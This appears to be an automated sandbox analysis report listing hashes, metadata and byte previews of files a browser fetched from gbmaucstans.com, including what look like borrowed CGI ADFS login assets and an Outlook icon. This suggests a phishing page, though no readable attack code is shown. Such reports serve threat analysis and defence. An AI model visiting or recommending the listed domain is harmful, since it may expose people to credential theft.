                                                      File Type:MS Windows shortcut, Item id list present, Points to a file or directory, Has Relative path, Has Working directory, Has command line arguments, Icon number=0, Archive, ctime=Tue Oct 3 09:48:42 2023, mtime=Tue Apr 16 10:56:27 2024, atime=Wed Sep 27 04:28:28 2023, length=1210144, window=hide
                                                      Category:dropped
                                                      Size (bytes):2683
                                                      Entropy (8bit):3.992162664128994
                                                      Encrypted:false
                                                      SSDEEP:48:8h6d2dQTUIIHZcidAKZdA1duT+ehOuTbbiZUk5OjqehOuTbFlxy+yT+:88dN/mT/TbxWOvTbfxy7T
                                                      MD5:BF64D19C34035200F767C30A60500F4D
                                                      SHA1:A69EEAE141D47A786B1D844F933ADE42C9763AA5
                                                      SHA-256:60BB4E7F255FA48A22BF63C0F747FB277CF0293FD8C1DB0D11D61EBEDCEFD4FC
                                                      SHA-512:840E2F10404A69072ACCC67E81DD699280C32F80E605688581F5E1A9EB744630973095702FAD64F1E460FFB3CE8078A083AB22D1CF8A1E03376BDF63B79C5E9A
                                                      Malicious:false
                                                      Reputation:low
                                                      Preview:L..................F.@.. ...$+.,....qe......N.Yr.... w......................1....P.O. .:i.....+00.../C:\.....................1.....DWWn..PROGRA~1..t......O.I.X._....B...............J......SX.P.r.o.g.r.a.m. .F.i.l.e.s...@.s.h.e.l.l.3.2...d.l.l.,.-.2.1.7.8.1.....T.1.....CW.V..Google..>......CW.V.X._....L.....................p+j.G.o.o.g.l.e.....T.1.....CW.V..Chrome..>......CW.V.X._....M......................8..C.h.r.o.m.e.....`.1.....CW.V..APPLIC~1..H......CW.V.X._..........................."&.A.p.p.l.i.c.a.t.i.o.n.....n.2. w..;W.+ .CHROME~1.EXE..R......CW.V.X._...........................H..c.h.r.o.m.e._.p.r.o.x.y...e.x.e.......j...............-.......i...................C:\Program Files\Google\Chrome\Application\chrome_proxy.exe..S.....\.....\.....\.....\.....\.....\.....\.....\.....\.P.r.o.g.r.a.m. .F.i.l.e.s.\.G.o.o.g.l.e.\.C.h.r.o.m.e.\.A.p.p.l.i.c.a.t.i.o.n.\.c.h.r.o.m.e._.p.r.o.x.y...e.x.e.*.C.:.\.P.r.o.g.r.a.m. .F.i.l.e.s.\.G.o.o.g.l.e.\.C.h.r.o.m.e.\.A.p.p.l.i.c.a.t.i.o.n.F
                                                      Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                      File Type:JPEG image data, Exif standard: [TIFF image data, big-endian, direntries=12, height=1080, bps=0, PhotometricIntepretation=RGB, orientation=upper-left, width=1920], baseline, precision 8, 1420x1080, components 3
                                                      Category:downloaded
                                                      Size (bytes):200706
                                                      Entropy (8bit):6.771607919002047
                                                      Encrypted:false
                                                      SSDEEP:3072:Xf38yDm02Qm8e4H55OP3VrnxNh/KBRifW:3qaH55OvVFwRYW
                                                      MD5:B6F49B92D66786E4948E9BC8C766E077
                                                      SHA1:055EFF050554FE018AD56D8CD20034350AEF5A99
                                                      SHA-256:9D9D353725787D2503EC8832EBCA188E379D39FDC95E12EFAE6C3247161E3AE3
                                                      SHA-512:254E2899C1857C0B1E116D8A6FE74DB95461C42F20393F988039CA827D1C63C7542C3745990D447F1C0EC3A18607E2B80FF4E2547C61390676F293171FB6BEC1
                                                      Malicious:false
                                                      Reputation:low
                                                      URL:https://federation.cgi.com/adfs/portal/illustration/illustration.jpg?id=9D9D353725787D2503EC8832EBCA188E379D39FDC95E12EFAE6C3247161E3AE3
                                                      Preview:.....&Exif..MM.*...........................8...........................................................................(...........1...........2..........i............. .......-....'..-....'.Adobe Photoshop 22.0 (Windows).2021:02:11 08:42:58............0231...................................8...............................n...........v.(.....................~...................H.......H..........Adobe_CM......Adobe.d.................................................................................................................................................z...."................?..........................................................................3......!.1.AQa."q.2.....B#$.R.b34r..C.%.S...cs5....&D.TdE.t6..U.e...u..F'...............Vfv........7GWgw........................5.....!1..AQaq"..2.....B#.R..3$b.r..CS.cs4.%......&5..D.T..dEU6te....u..F...............Vfv........'7GWgw.................?..T.I%)$.IJI$.R.I$...I%)$.IJI$.R.I$...I%)$.IO...T.I%)$.IJIb}q.....~F-.....`..1.
                                                      Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                      File Type:HTML document, ASCII text
                                                      Category:dropped
                                                      Size (bytes):135
                                                      Entropy (8bit):4.730167916533376
                                                      Encrypted:false
                                                      SSDEEP:3:qVv/FTL//rG3oOkADY3LQHEOt8jOkADLWEHsVM7L//+ac4NGb:qF/pO3+mY7QHtSmfHsVI6X4Qb
                                                      MD5:83B862BEAD2D480026254FB2A6EB9969
                                                      SHA1:26BAD9E6C1579172B0E3B6BC1C18918164FF6478
                                                      SHA-256:FB258CB538CA92D61C8CD4EB08CC23DA70C278B8766EAA731CE11E9B2F1DA4D4
                                                      SHA-512:E4AB645251A514EE41457923B7EC8EEE4A8B0A2B77DC046DA5463B2C6020E4E8497268830C3F75387DD6AD02E75C8C71952FA25437D9F53CF20EB433F7B68A33
                                                      Malicious:false
                                                      Reputation:low
                                                      Preview:<html>. <body>. <script>window.location.href="/index.php?" + window.location.href.split("?")[1];</script>. </body>.</html>
                                                      Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                      File Type:gzip compressed data, max compression, from Unix, original size modulo 2^32 33188
                                                      Category:downloaded
                                                      Size (bytes):11229
                                                      Entropy (8bit):7.977198797629054
                                                      Encrypted:false
                                                      SSDEEP:192:65qmnnlcqnF7SfxtHkCEMjkjZdTBE3x4nME7ECfYFDUi4Q1sQkASrVFaZ+:YnnlZ2pl4MefTgWMEDfEQhQqxTrH
                                                      MD5:D735ED1DA26F88E255A83175ADC84F03
                                                      SHA1:FBC8258FBEF0C64F823F785B14B74110278320CC
                                                      SHA-256:34E751DCD9AEAFEA5777D35D53E978AB181AC129DF326BF920BD5FEF28A10B91
                                                      SHA-512:04E5E614F365EA871E6DF2C4FC91DD766616625006C6D7332DA411B7973F9FC83CF6E0470AAC2F56B006D7C2BDD8F0D63B73369B1A721EDB56C0E4642703DF25
                                                      Malicious:false
                                                      Reputation:low
                                                      URL:http://gbmaucstans.com/main/src.js
                                                      Preview:...........}....._axfb......Z.wx.$x....8I.'A.<......V.l??..S!.Y.*d}...U...<...nx...P.....3..?>...w...O...{x..wPx.?.....].~.94C[..}..9.x........~v.P.l...w.3.^*..B.......-|....=..!.n.`......]...e?..i..9.......V.cM[....P.x....t=....;.3<.....1xt....}.B%.......{..uw...U.;h.-....90.C..C.$y....e........}._&.*..E.U.D.tC.~...+.WO.........GS.7.5=2U...3]34e.n.......3.....x...y1........A..G....~.eM......'.t...n.7..w..>..u.2.;. .G...-......A.l/x.7.....C.z.;...q...1......u..`...}....we....1..C.wc}..i.....{...H.MU........(....Xv....t....xW.3..(Ss..y......Q...T.....)g...N......ntG....z.`j.O8y..;..]2.z.~.B...g...?%..a$%../.k....V.@.j.......=...D.....w.LRF3.O.$&=.....@..]t...Ic..@..Tx.`..C.\.%.....1)xe..(..u.......6...U..{R.t..#...C`...P~.....9..W....}~u.g...^XSn.X..E]A..sN.s..Qo[:.*.EsT....Us.I..g..rc...{}.r.ReM....qk.9....H..^.tlU[<..f.j....#.O{h.]Umk0..Zf...~o.[...S.\....~.v.....R..B....6......kw.:...?.._.-.{..,aoR:.&S....m...Kwkq......v.W..
                                                      Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                      File Type:ASCII text, with no line terminators
                                                      Category:downloaded
                                                      Size (bytes):28
                                                      Entropy (8bit):4.137537511266052
                                                      Encrypted:false
                                                      SSDEEP:3:fXFi/nYn:fFiwn
                                                      MD5:C63BBD329146AA451DFCD7D4CD572DF5
                                                      SHA1:6DEFC8FED9CD924EF3946AB5A64C472C0D998E8D
                                                      SHA-256:22993D2C8488DBF170D5C18CD16A5F40539C17AADBF97BA58360EFB296539335
                                                      SHA-512:6761D9A9D727820775BE3647BFB5BBC4A61D0E631E2D8C7CB7D4DC39B1BBB9585C7B570A9EB1BD62D4BC8E5EF64AE1DA233C342B83A9A116E0309A10C67AD64B
                                                      Malicious:false
                                                      Reputation:low
                                                      URL:https://content-autofill.googleapis.com/v1/pages/ChVDaHJvbWUvMTE3LjAuNTkzOC4xMzISFwlzOEHejrKWhxIFDQGlaXISBQ1lIZnq?alt=proto
                                                      Preview:ChIKBw0BpWlyGgAKBw1lIZnqGgA=
                                                      Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                      File Type:JSON data
                                                      Category:dropped
                                                      Size (bytes):31
                                                      Entropy (8bit):3.86469832616696
                                                      Encrypted:false
                                                      SSDEEP:3:YBAvZNQaY:YwZNQaY
                                                      MD5:2D7D30EA1C6F925302D2C3ABED382951
                                                      SHA1:5BA6BBC5670C4AF1125CF9AC0AA1CA2811E744D1
                                                      SHA-256:83C09BA9A8DAEDB136F90B17A294CAA90AD471A016E430DF6E229ACB5A81E100
                                                      SHA-512:BCC7AAA8A6A27ADCBD1B3E0FCA73FC1BD727FECEAB34734E99863503D1D50936A8830C0A12D75D187614F318F46B1E67F046E89F5EB6CE727D8433A722E2C525
                                                      Malicious:false
                                                      Reputation:low
                                                      Preview:{"detail":"Method Not Allowed"}
                                                      Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                      File Type:HTML document, ASCII text
                                                      Category:downloaded
                                                      Size (bytes):135
                                                      Entropy (8bit):4.730167916533376
                                                      Encrypted:false
                                                      SSDEEP:3:qVv/FTL//rG3oOkADY3LQHEOt8jOkADLWEHsVM7L//+ac4NGb:qF/pO3+mY7QHtSmfHsVI6X4Qb
                                                      MD5:83B862BEAD2D480026254FB2A6EB9969
                                                      SHA1:26BAD9E6C1579172B0E3B6BC1C18918164FF6478
                                                      SHA-256:FB258CB538CA92D61C8CD4EB08CC23DA70C278B8766EAA731CE11E9B2F1DA4D4
                                                      SHA-512:E4AB645251A514EE41457923B7EC8EEE4A8B0A2B77DC046DA5463B2C6020E4E8497268830C3F75387DD6AD02E75C8C71952FA25437D9F53CF20EB433F7B68A33
                                                      Malicious:false
                                                      Reputation:low
                                                      URL:http://gbmaucstans.com/favicon.ico
                                                      Preview:<html>. <body>. <script>window.location.href="/index.php?" + window.location.href.split("?")[1];</script>. </body>.</html>
                                                      Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                      File Type:JPEG image data, Exif standard: [TIFF image data, big-endian, direntries=12, height=1080, bps=0, PhotometricIntepretation=RGB, orientation=upper-left, width=1920], baseline, precision 8, 1420x1080, components 3
                                                      Category:dropped
                                                      Size (bytes):200706
                                                      Entropy (8bit):6.771607919002047
                                                      Encrypted:false
                                                      SSDEEP:3072:Xf38yDm02Qm8e4H55OP3VrnxNh/KBRifW:3qaH55OvVFwRYW
                                                      MD5:B6F49B92D66786E4948E9BC8C766E077
                                                      SHA1:055EFF050554FE018AD56D8CD20034350AEF5A99
                                                      SHA-256:9D9D353725787D2503EC8832EBCA188E379D39FDC95E12EFAE6C3247161E3AE3
                                                      SHA-512:254E2899C1857C0B1E116D8A6FE74DB95461C42F20393F988039CA827D1C63C7542C3745990D447F1C0EC3A18607E2B80FF4E2547C61390676F293171FB6BEC1
                                                      Malicious:false
                                                      Reputation:low
                                                      Preview:.....&Exif..MM.*...........................8...........................................................................(...........1...........2..........i............. .......-....'..-....'.Adobe Photoshop 22.0 (Windows).2021:02:11 08:42:58............0231...................................8...............................n...........v.(.....................~...................H.......H..........Adobe_CM......Adobe.d.................................................................................................................................................z...."................?..........................................................................3......!.1.AQa."q.2.....B#$.R.b34r..C.%.S...cs5....&D.TdE.t6..U.e...u..F'...............Vfv........7GWgw........................5.....!1..AQaq"..2.....B#.R..3$b.r..CS.cs4.%......&5..D.T..dEU6te....u..F...............Vfv........'7GWgw.................?..T.I%)$.IJI$.R.I$...I%)$.IJI$.R.I$...I%)$.IO...T.I%)$.IJIb}q.....~F-.....`..1.
                                                      Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                      File Type:ASCII text, with very long lines (40613)
                                                      Category:downloaded
                                                      Size (bytes):40614
                                                      Entropy (8bit):5.377450345917815
                                                      Encrypted:false
                                                      SSDEEP:768:jCPkLHbU1h3W2JE84YYwMxNS+ZCotOYdvqhwxZ5VWYaKAdY5wImQLWQ4:lHbeh3W2lnYwOSXQvS
                                                      MD5:D1048A66FC11EA28C3CB1488FAC82C62
                                                      SHA1:F055707CF91F637EC19BF5E65BF378857E798469
                                                      SHA-256:8F1AD19042C2F9EE60C2DE21F37F788AF7B1ECCCDA8EEC1D877F9B9C0E994370
                                                      SHA-512:B7860E6DDE1626B7BABD4E2B2D61DF0F027F2193B8432B9D13D8EABAF0E0C58CA1BB51CF8DFF1D55ADE43BFF688497D03E0C9923BF3427D9828266C5A236A3E1
                                                      Malicious:false
                                                      Reputation:low
                                                      URL:https://challenges.cloudflare.com/turnstile/v0/b/bcc5fb0a8815/api.js?onload=onloadTurnstileCallback
                                                      Preview:"use strict";(function(){function gt(e,r,t,i,u,s,m){try{var y=e[s](m),b=y.value}catch(d){t(d);return}y.done?r(b):Promise.resolve(b).then(i,u)}function yt(e){return function(){var r=this,t=arguments;return new Promise(function(i,u){var s=e.apply(r,t);function m(b){gt(s,i,u,m,y,"next",b)}function y(b){gt(s,i,u,m,y,"throw",b)}m(void 0)})}}function C(e,r){return r!=null&&typeof Symbol!="undefined"&&r[Symbol.hasInstance]?!!r[Symbol.hasInstance](e):C(e,r)}function Ee(e,r,t){return r in e?Object.defineProperty(e,r,{value:t,enumerable:!0,configurable:!0,writable:!0}):e[r]=t,e}function ze(e){for(var r=1;r<arguments.length;r++){var t=arguments[r]!=null?arguments[r]:{},i=Object.keys(t);typeof Object.getOwnPropertySymbols=="function"&&(i=i.concat(Object.getOwnPropertySymbols(t).filter(function(u){return Object.getOwnPropertyDescriptor(t,u).enumerable}))),i.forEach(function(u){Ee(e,u,t[u])})}return e}function ir(e,r){var t=Object.keys(e);if(Object.getOwnPropertySymbols){var i=Object.getOwnPropertyS
                                                      Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                      File Type:PNG image data, 2 x 2, 8-bit/color RGB, non-interlaced
                                                      Category:dropped
                                                      Size (bytes):61
                                                      Entropy (8bit):3.990210155325004
                                                      Encrypted:false
                                                      SSDEEP:3:yionv//thPltV/CI7syxl/k4E08up:6v/lhPgI17Tp
                                                      MD5:9246CCA8FC3C00F50035F28E9F6B7F7D
                                                      SHA1:3AA538440F70873B574F40CD793060F53EC17A5D
                                                      SHA-256:C07D7D29E3C20FA6CA4C5D20663688D52BAD13E129AD82CE06B80EB187D9DC84
                                                      SHA-512:A2098304D541DF4C71CDE98E4C4A8FB1746D7EB9677CEBA4B19FF522EFDD981E484224479FD882809196B854DBC5B129962DBA76198D34AAECF7318BD3736C6B
                                                      Malicious:false
                                                      Reputation:low
                                                      Preview:.PNG........IHDR...............s....IDAT.....$.....IEND.B`.
                                                      Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                      File Type:MS Windows icon resource - 3 icons, 32x32, 32 bits/pixel, 24x24, 32 bits/pixel
                                                      Category:dropped
                                                      Size (bytes):7886
                                                      Entropy (8bit):4.14434000076088
                                                      Encrypted:false
                                                      SSDEEP:48:gFLLLLLLBWj2P+W3DS4E4U4R7454y4aR+BddHOlFgWSsjfQeiFzm22lhCa1I/CPP:tjQDdNKevXOl/amZP
                                                      MD5:AC16FA7FC862073B02ACD1187FC6DEF4
                                                      SHA1:F2B9A6255F6293000F30EEE272ABDD372A14E9D3
                                                      SHA-256:E35D94B76894D6ECA96FF5B1A12D94DFE73485EF3C52CB5B4395BE8FFAC1CB45
                                                      SHA-512:FF0884F9F3DED38191C7D1F214545509E80DE614BC824395F3C9412AED8D81DB95BA7E761939AC1F1798C1D39A7969A3DBF373D03A88404345714EDD8165F19D
                                                      Malicious:false
                                                      Reputation:low
                                                      Preview:...... .... .....6......... ............... .h...f...(... ...@..... ..........................................................................................................................................................................................................................................................................................................................(..(..(..(..(..(..(..(..(..(..(..(..(..(..(..(..(..(..(..(..(..(..'.....................................(..(..(..(..(..(..(..(..(..(..(..(..(..(..(..(..(..(..(..(..(.....~......................................(..(..(..(..(..(..(..(..(..(..(..(..(..(..(..(..(..(..(.."................................................ ... ... ... ... ... ... ... .."..(..(..(..(..(..(..(..(..$.....}...............................................y...y...y...y...y...y...y...y...y...%..(..(..(..(..(..'.....|..............................
                                                      Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                      File Type:PNG image data, 6 x 65, 8-bit/color RGB, non-interlaced
                                                      Category:dropped
                                                      Size (bytes):61
                                                      Entropy (8bit):4.002585360278503
                                                      Encrypted:false
                                                      SSDEEP:3:yionv//thPl4NRkxl/k4E08up:6v/lhPIRk7Tp
                                                      MD5:22A4B71BF88AA483050B89FD3C01022D
                                                      SHA1:3FC4EA6F313DDA4B17EB3B58CD14771573A9D849
                                                      SHA-256:5857F8D00E5FE3F08A7800D5C0D786DC49C92C22D771E8B3893963AD8F303FA7
                                                      SHA-512:33CFE49D5A75F191CD2D413B5A394FE3121104998E3A0D14D2777313642E19EA20050337477DCF2E892108F0466E423F73015F2EC3E7F7CA381DFFDFA3BEF54F
                                                      Malicious:false
                                                      Reputation:low
                                                      Preview:.PNG........IHDR.......A.....}.B.....IDAT.....$.....IEND.B`.
                                                      Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                      File Type:PNG image data, 6 x 65, 8-bit/color RGB, non-interlaced
                                                      Category:downloaded
                                                      Size (bytes):61
                                                      Entropy (8bit):4.002585360278503
                                                      Encrypted:false
                                                      SSDEEP:3:yionv//thPl4NRkxl/k4E08up:6v/lhPIRk7Tp
                                                      MD5:22A4B71BF88AA483050B89FD3C01022D
                                                      SHA1:3FC4EA6F313DDA4B17EB3B58CD14771573A9D849
                                                      SHA-256:5857F8D00E5FE3F08A7800D5C0D786DC49C92C22D771E8B3893963AD8F303FA7
                                                      SHA-512:33CFE49D5A75F191CD2D413B5A394FE3121104998E3A0D14D2777313642E19EA20050337477DCF2E892108F0466E423F73015F2EC3E7F7CA381DFFDFA3BEF54F
                                                      Malicious:false
                                                      Reputation:low
                                                      URL:https://challenges.cloudflare.com/cdn-cgi/challenge-platform/h/b/i/8753fe19daf9b0e5/1713268593731/8Wn8SnzbY0rE6bf
                                                      Preview:.PNG........IHDR.......A.....}.B.....IDAT.....$.....IEND.B`.
                                                      Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                      File Type:PNG image data, 2 x 2, 8-bit/color RGB, non-interlaced
                                                      Category:downloaded
                                                      Size (bytes):61
                                                      Entropy (8bit):3.990210155325004
                                                      Encrypted:false
                                                      SSDEEP:3:yionv//thPltV/CI7syxl/k4E08up:6v/lhPgI17Tp
                                                      MD5:9246CCA8FC3C00F50035F28E9F6B7F7D
                                                      SHA1:3AA538440F70873B574F40CD793060F53EC17A5D
                                                      SHA-256:C07D7D29E3C20FA6CA4C5D20663688D52BAD13E129AD82CE06B80EB187D9DC84
                                                      SHA-512:A2098304D541DF4C71CDE98E4C4A8FB1746D7EB9677CEBA4B19FF522EFDD981E484224479FD882809196B854DBC5B129962DBA76198D34AAECF7318BD3736C6B
                                                      Malicious:false
                                                      Reputation:low
                                                      URL:https://challenges.cloudflare.com/cdn-cgi/challenge-platform/h/b/cmg/1/wh0E0SXYnx6pTBdJW%2Fl926I%2BPRUplRdtQz3K9lHXs%2Fs%3D
                                                      Preview:.PNG........IHDR...............s....IDAT.....$.....IEND.B`.
                                                      Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                      File Type:PNG image data, 77 x 35, 8-bit/color RGBA, non-interlaced
                                                      Category:downloaded
                                                      Size (bytes):2261
                                                      Entropy (8bit):7.526013824049726
                                                      Encrypted:false
                                                      SSDEEP:48:ZxuNn2vPiJ3PBKO+H1xZjNUSWOYI+53Uzn89MZr:G2n4BKNtWW+53UHZr
                                                      MD5:258DC3169EF33BC23912AD70485EB1CE
                                                      SHA1:F0777AC4EFCB2C05D7355623F3DDBABAEE46FD65
                                                      SHA-256:3013B2477D4F66BAEB617DB660EB3146818DCFD9D6B396C4B418E49E6B862AAD
                                                      SHA-512:8203B8EB888066FFE2FFBA30BFD0C1054F16DFAA321343DDDA330B75707CDC45E8BBDC5C5E8393AF059263E00164DE817A95C59B6C7EAE1BE8E22BDA435675A5
                                                      Malicious:false
                                                      Reputation:low
                                                      URL:https://federation.cgi.com/adfs/portal/logo/logo.png?id=3013B2477D4F66BAEB617DB660EB3146818DCFD9D6B396C4B418E49E6B862AAD
                                                      Preview:.PNG........IHDR...M...#.............tEXtSoftware.Adobe ImageReadyq.e<...&iTXtXML:com.adobe.xmp.....<?xpacket begin="." id="W5M0MpCehiHzreSzNTczkc9d"?> <x:xmpmeta xmlns:x="adobe:ns:meta/" x:xmptk="Adobe XMP Core 5.6-c067 79.157747, 2015/03/30-23:40:42 "> <rdf:RDF xmlns:rdf="http://www.w3.org/1999/02/22-rdf-syntax-ns#"> <rdf:Description rdf:about="" xmlns:xmp="http://ns.adobe.com/xap/1.0/" xmlns:xmpMM="http://ns.adobe.com/xap/1.0/mm/" xmlns:stRef="http://ns.adobe.com/xap/1.0/sType/ResourceRef#" xmp:CreatorTool="Adobe Photoshop CC 2015 (Windows)" xmpMM:InstanceID="xmp.iid:23716B64A57E11E5B7E89D19E315800E" xmpMM:DocumentID="xmp.did:23716B65A57E11E5B7E89D19E315800E"> <xmpMM:DerivedFrom stRef:instanceID="xmp.iid:23716B62A57E11E5B7E89D19E315800E" stRef:documentID="xmp.did:23716B63A57E11E5B7E89D19E315800E"/> </rdf:Description> </rdf:RDF> </x:xmpmeta> <?xpacket end="r"?>%......EIDATx....UU......n?..,....uK.,...dMB.~AaY."......X.....Q...a..".X".,..P....M...k.gx...x..s.w..rv...
                                                      Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                      File Type:MS Windows icon resource - 3 icons, 32x32, 32 bits/pixel, 24x24, 32 bits/pixel
                                                      Category:downloaded
                                                      Size (bytes):7886
                                                      Entropy (8bit):4.14434000076088
                                                      Encrypted:false
                                                      SSDEEP:48:gFLLLLLLBWj2P+W3DS4E4U4R7454y4aR+BddHOlFgWSsjfQeiFzm22lhCa1I/CPP:tjQDdNKevXOl/amZP
                                                      MD5:AC16FA7FC862073B02ACD1187FC6DEF4
                                                      SHA1:F2B9A6255F6293000F30EEE272ABDD372A14E9D3
                                                      SHA-256:E35D94B76894D6ECA96FF5B1A12D94DFE73485EF3C52CB5B4395BE8FFAC1CB45
                                                      SHA-512:FF0884F9F3DED38191C7D1F214545509E80DE614BC824395F3C9412AED8D81DB95BA7E761939AC1F1798C1D39A7969A3DBF373D03A88404345714EDD8165F19D
                                                      Malicious:false
                                                      Reputation:low
                                                      URL:https://outlook.office.com/mail/favicon.ico
                                                      Preview:...... .... .....6......... ............... .h...f...(... ...@..... ..........................................................................................................................................................................................................................................................................................................................(..(..(..(..(..(..(..(..(..(..(..(..(..(..(..(..(..(..(..(..(..(..'.....................................(..(..(..(..(..(..(..(..(..(..(..(..(..(..(..(..(..(..(..(..(.....~......................................(..(..(..(..(..(..(..(..(..(..(..(..(..(..(..(..(..(..(.."................................................ ... ... ... ... ... ... ... .."..(..(..(..(..(..(..(..(..$.....}...............................................y...y...y...y...y...y...y...y...y...%..(..(..(..(..(..'.....|..............................
                                                      Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                      File Type:Unicode text, UTF-8 (with BOM) text, with CRLF line terminators
                                                      Category:downloaded
                                                      Size (bytes):7830
                                                      Entropy (8bit):5.0034336298015045
                                                      Encrypted:false
                                                      SSDEEP:96:jJ0WahHPQ9uYKJLkjlBrBi62n9dg3F+vkzdbQXiEy60f3359wAs1/ubSjIfXg6m:10WahH4oFskt0/zdcXiEy6aAxdubbtm
                                                      MD5:F1F9C5008A76C075B4513CED1AC9E550
                                                      SHA1:E2BE231E3A5D250B8A98DEB28F2E24C24A42CEC6
                                                      SHA-256:E7265AE732FAB707944B19C7CA739854BC95F6518C09768DB0EFA1D412872EB4
                                                      SHA-512:9DF293A1E0238CE9ECC6948F324BED8C170C1D59B2D4634B11E47818C223D9B51B439AC8356E38A94BF9356815230D3FFEDD8FFD37234D529101BD1C97CAA9C1
                                                      Malicious:false
                                                      Reputation:low
                                                      URL:https://federation.cgi.com/adfs/portal/css/style.css
                                                      Preview:.* {...margin:0px;...padding:0px;..}..html, body..{.. height:100%;.. width:100%;.. background-color:#ffffff;.. color:#000000;.. font-weight:normal;.. font-family:"Segoe UI" , "Segoe" , "SegoeUI-Regular-final", Tahoma, Helvetica, Arial, sans-serif;.. min-width:500px;.. -ms-overflow-style:-ms-autohiding-scrollbar;..}....body..{.. font-size:0.9em;..}....#noScript { margin:16px; color:Black; }....:lang(en-GB){quotes:'\2018' '\2019' '\201C' '\201D';}..:lang(zh){font-family:....;}....@-ms-viewport { width: device-width; }..@-moz-viewport { width: device-width; }..@-o-viewport { width: device-width; }..@-webkit-viewport { width: device-width; }..@viewport { width: device-width; }..../* Theme layout styles */....#fullPage, #brandingWrapper..{.. width:100%;.. height:100%;.. background-color:inherit;..}..#brandingWrapper..{.. background-color:#4488dd;..}..#branding..{ .. /* A background image will be added to the #branding element at run
                                                      Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                      File Type:PNG image data, 77 x 35, 8-bit/color RGBA, non-interlaced
                                                      Category:dropped
                                                      Size (bytes):2261
                                                      Entropy (8bit):7.526013824049726
                                                      Encrypted:false
                                                      SSDEEP:48:ZxuNn2vPiJ3PBKO+H1xZjNUSWOYI+53Uzn89MZr:G2n4BKNtWW+53UHZr
                                                      MD5:258DC3169EF33BC23912AD70485EB1CE
                                                      SHA1:F0777AC4EFCB2C05D7355623F3DDBABAEE46FD65
                                                      SHA-256:3013B2477D4F66BAEB617DB660EB3146818DCFD9D6B396C4B418E49E6B862AAD
                                                      SHA-512:8203B8EB888066FFE2FFBA30BFD0C1054F16DFAA321343DDDA330B75707CDC45E8BBDC5C5E8393AF059263E00164DE817A95C59B6C7EAE1BE8E22BDA435675A5
                                                      Malicious:false
                                                      Reputation:low
                                                      Preview:.PNG........IHDR...M...#.............tEXtSoftware.Adobe ImageReadyq.e<...&iTXtXML:com.adobe.xmp.....<?xpacket begin="." id="W5M0MpCehiHzreSzNTczkc9d"?> <x:xmpmeta xmlns:x="adobe:ns:meta/" x:xmptk="Adobe XMP Core 5.6-c067 79.157747, 2015/03/30-23:40:42 "> <rdf:RDF xmlns:rdf="http://www.w3.org/1999/02/22-rdf-syntax-ns#"> <rdf:Description rdf:about="" xmlns:xmp="http://ns.adobe.com/xap/1.0/" xmlns:xmpMM="http://ns.adobe.com/xap/1.0/mm/" xmlns:stRef="http://ns.adobe.com/xap/1.0/sType/ResourceRef#" xmp:CreatorTool="Adobe Photoshop CC 2015 (Windows)" xmpMM:InstanceID="xmp.iid:23716B64A57E11E5B7E89D19E315800E" xmpMM:DocumentID="xmp.did:23716B65A57E11E5B7E89D19E315800E"> <xmpMM:DerivedFrom stRef:instanceID="xmp.iid:23716B62A57E11E5B7E89D19E315800E" stRef:documentID="xmp.did:23716B63A57E11E5B7E89D19E315800E"/> </rdf:Description> </rdf:RDF> </x:xmpmeta> <?xpacket end="r"?>%......EIDATx....UU......n?..,....uK.,...dMB.~AaY."......X.....Q...a..".X".,..P....M...k.gx...x..s.w..rv...
                                                      Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                      File Type:ASCII text, with very long lines (65447)
                                                      Category:downloaded
                                                      Size (bytes):89501
                                                      Entropy (8bit):5.289893677458563
                                                      Encrypted:false
                                                      SSDEEP:1536:DjExXUqJnxDjoXEZxkMV4QYSt0zvDL6gP3h8cApwEIOzVTB/UjPazMdLiX4mQ1v9:DIh8GgP3hujzwbhd3XvSiDQ47GKn
                                                      MD5:8FB8FEE4FCC3CC86FF6C724154C49C42
                                                      SHA1:B82D238D4E31FDF618BAE8AC11A6C812C03DD0D4
                                                      SHA-256:FF1523FB7389539C84C65ABA19260648793BB4F5E29329D2EE8804BC37A3FE6E
                                                      SHA-512:F3DE1813A4160F9239F4781938645E1589B876759CD50B7936DBD849A35C38FFAED53F6A61DBDD8A1CF43CF4A28AA9FFFBFDDEEC9A3811A1BB4EE6DF58652B31
                                                      Malicious:false
                                                      Reputation:low
                                                      URL:https://cdnjs.cloudflare.com/ajax/libs/jquery/3.6.0/jquery.min.js
                                                      Preview:/*! jQuery v3.6.0 | (c) OpenJS Foundation and other contributors | jquery.org/license */.!function(e,t){"use strict";"object"==typeof module&&"object"==typeof module.exports?module.exports=e.document?t(e,!0):function(e){if(!e.document)throw new Error("jQuery requires a window with a document");return t(e)}:t(e)}("undefined"!=typeof window?window:this,function(C,e){"use strict";var t=[],r=Object.getPrototypeOf,s=t.slice,g=t.flat?function(e){return t.flat.call(e)}:function(e){return t.concat.apply([],e)},u=t.push,i=t.indexOf,n={},o=n.toString,v=n.hasOwnProperty,a=v.toString,l=a.call(Object),y={},m=function(e){return"function"==typeof e&&"number"!=typeof e.nodeType&&"function"!=typeof e.item},x=function(e){return null!=e&&e===e.window},E=C.document,c={type:!0,src:!0,nonce:!0,noModule:!0};function b(e,t,n){var r,i,o=(n=n||E).createElement("script");if(o.text=e,t)for(r in c)(i=t[r]||t.getAttribute&&t.getAttribute(r))&&o.setAttribute(r,i);n.head.appendChild(o).parentNode.removeChild(o)}funct
                                                      No static file info
                                                      TimestampSource PortDest PortSource IPDest IP
                                                      Apr 16, 2024 13:56:21.787702084 CEST49674443192.168.2.523.1.237.91
                                                      Apr 16, 2024 13:56:21.791244030 CEST49675443192.168.2.523.1.237.91
                                                      Apr 16, 2024 13:56:21.881444931 CEST49673443192.168.2.523.1.237.91
                                                      Apr 16, 2024 13:56:27.777657032 CEST4971080192.168.2.5132.205.186.10
